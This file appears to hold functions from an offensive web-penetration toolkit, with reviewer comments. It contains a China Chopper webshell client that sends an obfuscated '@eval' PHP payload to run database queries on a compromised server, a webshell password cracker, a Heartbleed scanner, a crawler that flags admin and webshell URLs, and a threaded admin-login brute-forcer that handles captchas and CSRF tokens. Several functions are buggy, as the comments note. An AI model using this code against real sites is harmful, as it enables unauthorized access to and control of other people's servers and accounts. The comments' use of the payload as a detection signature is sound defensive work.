def query(queryString):
    """Send one request to the remote PHP handler and return its trimmed body.

    All connection state is module-level (``mode``, ``url``, ``postData``,
    ``httpHeaderContent`` and the db* values); this function both reads and
    mutates it, so calls are order-dependent:

    * ``mode == 1``: (re)build the whole ``postData`` dict and the request
      headers.  ``queryString`` is NOT used on this path.
    * otherwise: reuse ``postData``/``httpHeaderContent`` left over from an
      earlier call and only replace ``z4`` (db name) and ``z5`` (the query,
      base64-encoded as bytes).

    Returns the response body decoded as UTF-8 with the first three and the
    last three characters stripped — presumably delimiter markers emitted by
    the remote side (TODO confirm against the handler).
    """
    global mode
    global httpHeaderContent
    global dbHost, dbUser, dbPass, dbName, postData, url, chopperPass
    if mode == 1:
        # z0 is the (redacted on this page) server-side code block that the
        # handler below decodes and executes; z1..z4 are the db parameters.
        postData['z0'] = "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"
        postData['z1'] = dbHost
        postData['z2'] = dbUser
        postData['z3'] = dbPass
        postData['z4'] = dbName
        # The chr() chain spells "base64_decode"; the value under the
        # chopperPass key is a PHP snippet that decodes z0 from $_POST and
        # evals it.  This is the classic "China Chopper" webshell protocol —
        # useful as a detection signature (chr()-obfuscated function name,
        # @eval on $_POST, z0..zN parameter names).
        postData[chopperPass] = "$xx=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$yy=$_POST;@eval($xx($yy[z0]));"
        # Fresh randomised headers; Referer is pinned to the target's own
        # scheme://host so the request looks same-origin.
        httpHeaderContent = get_random_header()
        httpHeaderContent['Referer'] = get_http_domain_from_url(url)
        httpHeaderContent['Content-Type'] = "application/x-www-form-urlencoded"
    else:
        postData["z4"] = dbName
        # b64encode returns bytes; relies on post_requests accepting bytes
        # values in the form dict (TODO confirm).
        postData["z5"] = base64.b64encode(queryString.encode(encoding="utf-8"))
    # NOTE(review): if mode != 1 and no earlier mode == 1 call populated
    # httpHeaderContent, this raises NameError — there is no guard.
    result = post_requests(url, data=postData, headers=httpHeaderContent)
    html = result.content.decode("utf8")
    return html[3:-3]
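def targets(request):
    """Django view behind targets.html: list, add or delete scan targets.

    Query parameters (all optional):
        action:      "query" | "add" | "delete"; anything else just renders
                     the page.
        targetValue: target URL for "add" / "delete"; it is normalised with
                     get_http_domain_from_url() before use.

    Returns an HttpResponse with a short status text for the three actions,
    otherwise the rendered targets.html template.

    The table names (first_targets_table_name, targets_table_name) and db_name
    are module-level constants, so targetValue is the only untrusted input.
    It used to be interpolated into SQL and echoed back into HTML verbatim;
    it is now checked against a strict character allowlist before touching
    either, and database-sourced strings are HTML-escaped on output.
    """
    from html import escape  # local import: the module's import block is not visible here

    # Characters a normalised "scheme://host[:port]" value may contain.
    # Anything else (quotes, spaces, angle brackets, semicolons, ...) is
    # rejected before the value reaches a %-formatted SQL statement or the
    # response body.  TODO confirm get_http_domain_from_url() never emits
    # other characters for legitimate targets.
    allowed_chars = set(
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._:/-"
    )

    def _domains_as_text(table_name):
        # One http_domain per line, "None" when the table is empty.  Values are
        # escaped because they come from the database, not from this request.
        rows = execute_sql_in_db("select http_domain from %s" % table_name, db_name)
        if not rows:
            return "None\n"
        return "".join(escape(row[0]) + "\n" for row in rows)

    target_value = request.GET.get('targetValue')
    action = request.GET.get('action')
    if target_value is not None:
        print(target_value)

    if action == "query":
        string = (
            "first targets:\n" + _domains_as_text(first_targets_table_name)
            + "\n" + "targets:\n" + _domains_as_text(targets_table_name)
        )
        return HttpResponse(string.replace("\n", "<br>"))

    if action in ("add", "delete"):
        if target_value is None:
            return HttpResponse("targetValue is required", status=400)
        target_value = get_http_domain_from_url(target_value)
        # Allowlist check: this is what keeps the %-formatted SQL below and
        # the echoed response safe without knowing execute_sql_in_db's
        # parameter-binding API.
        if not target_value or not set(target_value) <= allowed_chars:
            return HttpResponse("invalid targetValue", status=400)
        domain = target_value.split("/")[-1]  # host[:port] part of scheme://host[:port]
        if action == "add":
            execute_sql_in_db(
                "insert into %s(http_domain,domain) values('%s','%s')"
                % (targets_table_name, target_value, domain),
                db_name)
            string = "add new target %s for scan successully:D" % target_value
        else:
            execute_sql_in_db(
                "DELETE FROM `%s` WHERE http_domain='%s'"
                % (targets_table_name, target_value),
                db_name)
            string = "delete target %s from db successully:D" % target_value
        return HttpResponse(string)

    # No (or unknown) action: plain page load — this return must stay.
    print("normal visit without action request to targets.html")
    return render(request, "targets.html", {})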
def crack_webshell(url, anyway=1):
    """Try to recover the password of a suspected webshell at ``url``.

    Returns a human-readable result string, or "" when the direct attempt
    fails.  Relies on module-level ``ModulePath`` and ``Fore`` plus several
    helpers (check_webshell_url, crack_ext_direct_webshell_url, ...) whose
    contracts are not visible here.

    Original (translated) note on the second parameter: "webshell cracking;
    the second parameter defaults to 0 — if non-zero the webshell check is
    skipped; 1 = crack directly the direct_bao way, 2 = the biaodan_bao way."
    NOTE(review): the actual default is 1, not 0, so the check is skipped by
    default.
    """
    figlet2file("cracking webshell", 0, True)
    print("cracking webshell --> %s" % url)
    print("正在使用吃奶的劲爆破...")
    ext = get_webshell_suffix_type(url)
    # tmp['y2'] is the classification from check_webshell_url; the values
    # compared below are the only ones this function knows about.
    tmp = check_webshell_url(url)
    url_http_domain = get_http_domain_from_url(url)  # NOTE(review): unused
    if tmp['y2'] == 'direct_bao' or tmp['y2'] == 'biaodan_bao':
        pass  # no-op branch, left from earlier logic
    if anyway == 1 or tmp['y2'] == "direct_bao":
        return_value = crack_ext_direct_webshell_url(
            url, ModulePath + "dicts/webshell_passwords.txt", ext)
        if return_value['cracked'] == 0:
            print("webshell爆破失败 :(")
            return ""
        else:
            # Translated: on success, mark cracked_webshell_url_info with the
            # webshell password info and add it to the cracked_webshell_urls_info
            # field of the corresponding non-urls table.
            strings_to_write = "webshell:%s,password:%s" % (
                url, return_value['password'])
    elif anyway == 2 or tmp['y2'] == "biaodan_bao":
        # NOTE(review): this branch is a stub — the form-based path is
        # disabled (the string literal below is the old implementation), so
        # strings_to_write is never bound and the final return raises
        # UnboundLocalError.
        pass
        ''' return_value = crack_allext_biaodan_webshell_url( url, ModulePath + "dicts/user.txt", ModulePath + "dicts/webshell_passwords.txt") if return_value['cracked'] == 0: print("webshell爆破失败 :(") return "" else: # 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应表中的 # cracked_webshell_urls_info字段中 strings_to_write = "webshell:%s,password:%s" % ( url, return_value['password']) '''
    elif tmp['y2'] == "bypass":
        print(
            Fore.RED + "congratulations!!! webshell may found and has no password!!!")
        string = "cracked webshell:%s no password!!!" % url
        print(Fore.RED + string)
        # Translated: on success, mark cracked_webshell_url_info with the
        # webshell password info and add it to the cracked_webshell_urls_info
        # field of the corresponding table.
        # NOTE(review): return_value is not bound on this branch, so the line
        # below raises NameError; `string` already holds the intended message.
        strings_to_write = "webshell:%s,password:%s" % (
            url, return_value['password'])
    else:
        strings_to_write = "这不是一个webshell :("
    return strings_to_write
# Stand-alone script: checks every non-web open port of the target given as
# argv[1] for the Heartbleed bug by shelling out to the bundled python2
# ssltest.py and grepping its output.
# NOTE(review): `os` and `re` are used below but not imported in this span —
# presumably imported earlier in the file; confirm.
import sys
# The exp10it helper package is loaded from ~/mypypi rather than site-packages.
exp10it_module_path = os.path.expanduser("~") + "/mypypi"
sys.path.insert(0, exp10it_module_path)
from urllib.parse import urlparse
from exp10it import get_string_from_command
from exp10it import CLIOutput
from exp10it import get_target_table_name_list
from exp10it import COMMON_NOT_WEB_PORT_LIST
from exp10it import get_http_domain_from_url
from exp10it import get_target_open_port_list
current_dir = os.path.split(os.path.realpath(__file__))[0]
target = sys.argv[1]  # no usage message: IndexError when run without an argument
print("checking heartbleed vul for " + target)
open_port_list = get_target_open_port_list(target)
http_domain = get_http_domain_from_url(target)  # NOTE(review): unused below
hostname = urlparse(target).hostname
target_table_name = get_target_table_name_list(target)[0]  # NOTE(review): unused below
parsed = urlparse(target)
# NOTE(review): second call to the same helper; the first result is discarded.
open_port_list = get_target_open_port_list(target)
if ":" in parsed.netloc:
    # Explicit port in the URL is appended as a str; whether the helper's
    # entries are str or int is not visible here (TODO confirm, affects the
    # membership test below).
    open_port_list.append(parsed.netloc.split(":")[1])
for each in open_port_list:
    if each not in COMMON_NOT_WEB_PORT_LIST:
        # NOTE(review): hostname and port are interpolated into a shell
        # command string.  If the target string can come from an untrusted
        # source (e.g. a database of crawled URLs) this is shell injection;
        # prefer subprocess with an argument list, or shlex.quote().
        a = get_string_from_command("cd %s && python2 ssltest.py -p %s %s " % (current_dir, each, hostname))
        if re.search(r"server is vulnerable", a, re.I):
            string_to_write = "Congratulations! heartbleed vul exists on %s:%s" % (
                hostname, each)
            CLIOutput().good_print(string_to_write)
def parse_get(self, response):
    """Scrapy/Splash callback for a GET response.

    Yields one CrawlerItem for the page, then one SplashRequest per newly
    discovered same-host URL ("^"-separated entries are treated as POST
    url^body pairs and routed to parse_post).

    Reads self.cookie, self.start_url, self.domain, self.collected_urls and
    self.lua_script; calls self.add_url_templet_to_collected_urls().
    """
    item = CrawlerItem()
    item['code'] = response.status
    item['current_url'] = response.url
    item['resources_file_list'] = []
    item['sub_domains_list'] = []
    item['like_admin_login_url'] = False
    item['like_webshell_url'] = False
    if response.status == 200:
        urls = collect_urls_from_html(response.text, response.url)
        title_list = response.xpath('//title/text()').extract()
        item['title'] = None if len(title_list) == 0 else title_list[0]
        item['content'] = response.text
    else:
        # Non-200 through Splash: re-fetch directly to get title/content.
        a = get_request(response.url, cookie=self.cookie)
        item['title'] = a['title']
        item['content'] = a['content']
        urls = collect_urls_from_html(a['content'], response.url)
    # NOTE(review): both lines below use `==` (a comparison whose result is
    # discarded) where an assignment was intended, so these flags always stay
    # False and the pipeline never records admin-login / webshell candidates.
    if like_admin_login_content(item['content']):
        item['like_admin_login_url'] == True
    if check_url_has_webshell_content(item['current_url'], item['content'],
                                      item['code'], item['title'])['y1']:
        item['like_webshell_url'] == True
    # The item is yielded before resources_file_list / sub_domains_list are
    # filled in below; the pipeline sees the same list objects, so whether it
    # observes the later appends depends on scheduling (TODO confirm).
    yield item
    url_main_target_domain = get_url_belong_main_target_domain(
        self.start_url)
    for url in urls:
        url_templet_list = get_url_templet_list(url)
        url_http_domain = get_http_domain_from_url(url)
        # Sub-domains of the main target are recorded even though they are
        # not crawled (hostname check below).
        if url_is_sub_domain_to_http_domain(
                url, urlparse(url)[0] + "://" + url_main_target_domain
        ) and url_http_domain not in item['sub_domains_list']:
            item['sub_domains_list'].append(url_http_domain)
        if urlparse(url).hostname != self.domain:
            continue
        if url in self.collected_urls:
            continue
        # Skip URLs whose parameter template was already seen.
        _flag = 0
        for _ in url_templet_list:
            if _ in self.collected_urls:
                _flag = 1
                break
        if _flag == 1:
            continue
        self.add_url_templet_to_collected_urls(url)
        if "^" in url:
            # POST-type url: "action_url^body"
            post_url_list = url.split("^")
            post_url = post_url_list[0]
            post_data = post_url_list[1]
            yield SplashRequest(post_url,
                                callback=self.parse_post,
                                endpoint='execute',
                                magic_response=True,
                                meta={
                                    'handle_httpstatus_all': True,
                                    'current_url': url
                                },
                                args={
                                    'lua_source': self.lua_script,
                                    'http_method': 'POST',
                                    'body': post_data
                                })
        else:
            # GET-type url
            match_resource = re.match(RESOURCE_FILE_PATTERN, url)
            # Logout-like URLs are neither recorded nor followed, so the
            # crawler does not end its own session.
            match_logoff = re.search(
                r"(logout)|(logoff)|(exit)|(signout)|(signoff)", url, re.I)
            if match_resource:
                item['resources_file_list'].append(url)
            elif match_logoff:
                pass
            else:
                yield SplashRequest(url,
                                    self.parse_get,
                                    endpoint='execute',
                                    magic_response=True,
                                    meta={'handle_httpstatus_all': True},
                                    args={'lua_source': self.lua_script})
def process_item(self, item, spider):
    """Scrapy pipeline: persist one CrawlerItem into the per-target tables.

    Three writes, in order: (1) the page row in the target's *_urls table,
    (2) resource files and admin-login / webshell flags into the pang/sub or
    (first_)targets table selected by get_target_table_name_info(), and
    (3) newly seen sub-domains into the *_sub table plus a log file.
    Returns the item unchanged.  Uses module-level DB_NAME, TARGETS_TABLE_NAME,
    FIRST_TARGETS_TABLE_NAME and LOG_FOLDER_PATH.
    """
    current_url = item['current_url']
    parsed = urlparse(current_url)
    hostname = parsed.hostname  # None for URLs without a host; see re.match below
    code = item['code']
    title = item['title']
    content = item['content']
    # POST entries are stored as "url^body"; strip the body part.
    if "^" in current_url:
        pure_url = current_url.split("^")[0]
    else:
        pure_url = current_url
    http_domain = get_http_domain_from_url(current_url)
    main_target_domain = get_url_belong_main_target_domain(pure_url)
    pang_table_name = main_target_domain.replace(".", "_") + "_pang"
    sub_table_name = main_target_domain.replace(".", "_") + "_sub"
    target_table_info = get_target_table_name_info(current_url)
    if not target_table_info['target_is_pang_or_sub']:
        url_start_url = get_url_start_url(pure_url)
        url_table_name = get_start_url_urls_table(url_start_url)
    else:
        # NOTE(review): url_start_url is not bound on this path but is used
        # by the *_targets branches below — presumably those are mutually
        # exclusive with target_is_pang_or_sub (TODO confirm).
        url_table_name = get_http_domain_from_url(pure_url).split(
            "/")[-1].replace(".", "_") + "_urls"
    # 1. write [current_url],[code],[title],[content],[like_admin_login_url],[like_webshell_url] to database
    primary_key = "url"
    primary_value = current_url
    # NOTE(review): leftover debugging — primary_key is always "url", so this
    # never fires; remove it.
    if primary_key == "http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=":
        input(44444444444444444444444)
    write_string_to_sql(str(code), DB_NAME, url_table_name, 'code',
                        primary_key, primary_value)
    write_string_to_sql(title, DB_NAME, url_table_name, 'title',
                        primary_key, primary_value)
    write_string_to_sql(content, DB_NAME, url_table_name, 'content',
                        primary_key, primary_value)
    if item['like_admin_login_url']:
        write_string_to_sql('1', DB_NAME, url_table_name,
                            'like_admin_login_url', primary_key, primary_value)
    if item['like_webshell_url']:
        write_string_to_sql('1', DB_NAME, url_table_name,
                            'like_webshell_url', primary_key, primary_value)
    # 2. write [resources_file_list],[like_admin_login_urls] && [like_webshell_urls],[sub_domains_list] to database
    # write [resources_file_list]
    # NOTE(review): if none of the four branches matches, _table_name_list is
    # unbound and the loops below raise UnboundLocalError.
    if target_table_info['target_is_pang_or_sub'] and not target_table_info[
            'target_is_pang_and_sub']:
        _table_name = pang_table_name if target_table_info[
            'target_is_only_pang'] else sub_table_name
        _table_name_list = [_table_name]
        primary_key = 'http_domain'
        primary_value = http_domain
    elif target_table_info['target_is_pang_and_sub']:
        _table_name_list = [pang_table_name, sub_table_name]
        primary_key = 'http_domain'
        primary_value = http_domain
    elif target_table_info['target_is_main_and_table_is_targets']:
        _table_name_list = [TARGETS_TABLE_NAME]
        primary_key = 'start_url'
        primary_value = url_start_url
    elif target_table_info['target_is_main_and_table_is_first_targets']:
        _table_name_list = [FIRST_TARGETS_TABLE_NAME]
        primary_key = 'start_url'
        primary_value = url_start_url
    for each in item['resources_file_list']:
        for each_table in _table_name_list:
            auto_write_string_to_sql(each, DB_NAME, each_table,
                                     "resource_files", primary_key,
                                     primary_value)
    # write [like_admin_login_urls] and [like_webshell_urls]
    for each_table in _table_name_list:
        if item['like_admin_login_url']:
            auto_write_string_to_sql(current_url, DB_NAME, each_table,
                                     "like_admin_login_urls", primary_key,
                                     primary_value)
        if item['like_webshell_url']:
            auto_write_string_to_sql(current_url, DB_NAME, each_table,
                                     "like_webshell_urls", primary_key,
                                     primary_value)
    # write [sub_domains_list] to database
    if target_table_info['target_is_main']:
        # Sub-domain bookkeeping only makes sense for a hostname, not an IP.
        # NOTE(review): hostname may be None here, which makes re.match raise
        # TypeError.
        if not re.match(r"(\d+\.){3}\d+", hostname):
            _result = execute_sql_in_db(
                "select http_domain from %s" % sub_table_name, DB_NAME)
            exist_sub_domains_list = []
            for each in _result:
                exist_sub_domains_list.append(each[0])
            for each in item['sub_domains_list']:
                if each not in exist_sub_domains_list:
                    # write to database
                    # NOTE(review): `each` originates from links found in
                    # crawled HTML, i.e. content controlled by the scanned
                    # site.  Below it is interpolated into SQL and then into
                    # three os.system() shell strings — a crafted link can
                    # inject SQL or shell commands into the scanner host.
                    # Use parameterised SQL, os.makedirs() and a plain file
                    # write instead of mkdir/echo via the shell.
                    sql = "insert ignore into `%s`(http_domain,domain) values('%s','%s')" % (
                        sub_table_name, each, each.split("/")[-1])
                    execute_sql_in_db(sql, DB_NAME)
                    # write to config.ini
                    if not os.path.exists(LOG_FOLDER_PATH):
                        os.system("mkdir %s" % LOG_FOLDER_PATH)
                    if not os.path.exists("%s/sub" % LOG_FOLDER_PATH):
                        os.system("cd %s && mkdir sub" % LOG_FOLDER_PATH)
                    os.system("echo %s >> %s" % (each.split("/")[-1],
                                                 LOG_FOLDER_PATH + "/sub/" + sub_table_name + ".txt"))
    else:
        pass
    return item
def crack_admin_login_url_thread(url,username,password):
    """Worker body for one username/password attempt against a login form.

    Almost all inputs are module-level shared state set up by the caller:
    requestAction, form_action_url, user_form_name, pass_form_name,
    has_yanzhengma / yanzhengma_* (captcha handling), hasCsrfToken /
    csrfTokenName / csrfTokenPart / currentCsrfTokenPart, the requests
    session ``s``, logined_least_length, and the one-element progress lists
    get_flag, try_time, start, biaoji_time, remain_time, sum, return_string.

    Returns ``{'username': ..., 'password': ...}`` when the response length
    exceeds logined_least_length (the success heuristic), otherwise falls off
    the end and returns None.

    NOTE(review): the shared lists are read and written from multiple threads
    without any lock, so try_time/currentCsrfTokenPart updates can interleave;
    the CSRF token rotation in particular assumes strictly sequential attempts.
    """
    if get_flag[0] == 1:
        return  # another worker already succeeded
    try_time[0] += 1
    if requestAction=="GET":
        # Credentials are substituted into the query string by regex; note
        # that re.sub() interprets backslashes in the replacement, so a
        # password containing "\" is not inserted literally.
        final_request_url=form_action_url
        final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" % (user_form_name,username),final_request_url)
        final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" % (pass_form_name,password),final_request_url)
        if has_yanzhengma[0]:
            if needOnlyGetOneYanZhengMa:
                yanzhengmaValue=onlyOneYanZhengMaValue
            else:
                yanzhengmaValue=get_one_valid_yangzhengma_from_src(yanzhengma_src)
            final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" % (yanzhengma_form_name,yanzhengmaValue),final_request_url)
        if hasCsrfToken:
            # currentCsrfTokenPart[0] holds "name=value" from the previous response.
            final_request_url=re.sub(r"%s=[^&]*" % csrfTokenName,currentCsrfTokenPart[0],final_request_url)
        html=s.get(final_request_url).text
        if hasCsrfToken:
            csrfTokenValue=get_csrf_token_value_from_html(html)
            currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
    else:
        # post request: form_action_url is "action_url^k1=v1&k2=v2"
        paramPartValue=form_action_url.split("^")[1]
        paramList=paramPartValue.split("&")
        values={}
        for eachP in paramList:
            eachPList=eachP.split("=")  # NOTE(review): IndexError on a key without "="
            eachparamName=eachPList[0]
            eachparamValue=eachPList[1]
            if eachparamName==user_form_name:
                eachparamValue=username
            if eachparamName==pass_form_name:
                eachparamValue=password
            values[eachparamName]=eachparamValue
        if has_yanzhengma[0]:
            if not needOnlyGetOneYanZhengMa:
                values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src)
            else:
                values[yanzhengma_form_name]=onlyOneYanZhengMaValue
        if hasCsrfToken:
            # Extract the value part of "name=value".
            values[csrfTokenName]=re.search(r"[^=]+=(.*)",currentCsrfTokenPart[0]).group(1)
        html = s.post(form_action_url.split("^")[0], values).text
        if hasCsrfToken:
            csrfTokenValue=get_csrf_token_value_from_html(html)
            currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
    # Progress-line label, padded to a fixed width so the "\r" redraw is clean.
    USERNAME_PASSWORD = "******" + username + ":" + \
        password + ")" + (52 - len(password)) * " "
    # Translated: recompute the average speed every 100 completed attempts.
    # `sum` here is the module-level total-attempts list, shadowing the builtin.
    left_time = get_remain_time(
        start[0], biaoji_time[0], remain_time[0], 100, try_time[0], sum[0])
    remain_time[0] = left_time
    sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) + '%' + ' %s/%s remain time:%s %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD))
    sys.stdout.flush()
    # Success heuristic: a longer-than-threshold response body.  Error pages
    # larger than the threshold produce false positives (TODO confirm how
    # logined_least_length is calibrated).
    if len(html) > logined_least_length:
        # Translated: treat as successful login.
        get_flag[0] = 1
        end = time.time()
        CLIOutput().good_print(
            "congratulations!!! admin login url cracked succeed!!!", "red")
        string = "cracked admin login url:%s username and password:(%s:%s)" % (
            url, username, password)
        CLIOutput().good_print(string, "red")
        return_string[0]=string
        print("you spend time:" + str(end - start[0]))
        http_domain_value = get_http_domain_from_url(url)
        # Translated: verified that terminate() only ends the current thread,
        # it cannot end all threads.
        # NOTE(review): table_name_list and urls_table_name are computed but
        # never used here.
        table_name_list = get_target_table_name_list(http_domain_value)
        urls_table_name = http_domain_value.split(
            "/")[-1].replace(".", "_") + "_urls"
        return {'username': username, 'password': password}